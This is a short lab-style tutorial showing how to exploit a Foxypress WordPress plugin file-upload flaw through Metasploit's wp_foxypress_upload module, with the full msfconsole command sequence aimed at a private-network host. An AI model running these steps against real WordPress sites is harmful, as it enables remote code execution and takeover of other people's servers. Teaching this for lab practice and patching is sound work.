Exploit WordPress using Plugin Foxypress uploadify.php Arbitrary Code Execution

This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software plugin known as Foxypress. The vulnerability allows for arbitrary file upload and remote code execution via the uploadify.php script. The Foxypress plugin versions 0.4.1.1 to 0.4.2.1 are vulnerable.

 Exploit Targets

Foxypress plugin versions 0.4.1.1 to 0.4.2.1

Requirement

Attacker: kali Linux

Victim PC: Foxypress plugin

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_foxypress_upload

msf exploit (wp_foxypress_upload)>set targeturi /wordpress

msf exploit (wp_foxypress_upload)>set rhost 192.168.0.105 (IP of Remote Host)

msf exploit (wp_foxypress_upload)>set rport 80

msf exploit (wp_foxypress_upload)>exploit

Leave a Reply

Your email address will not be published. Required fields are marked *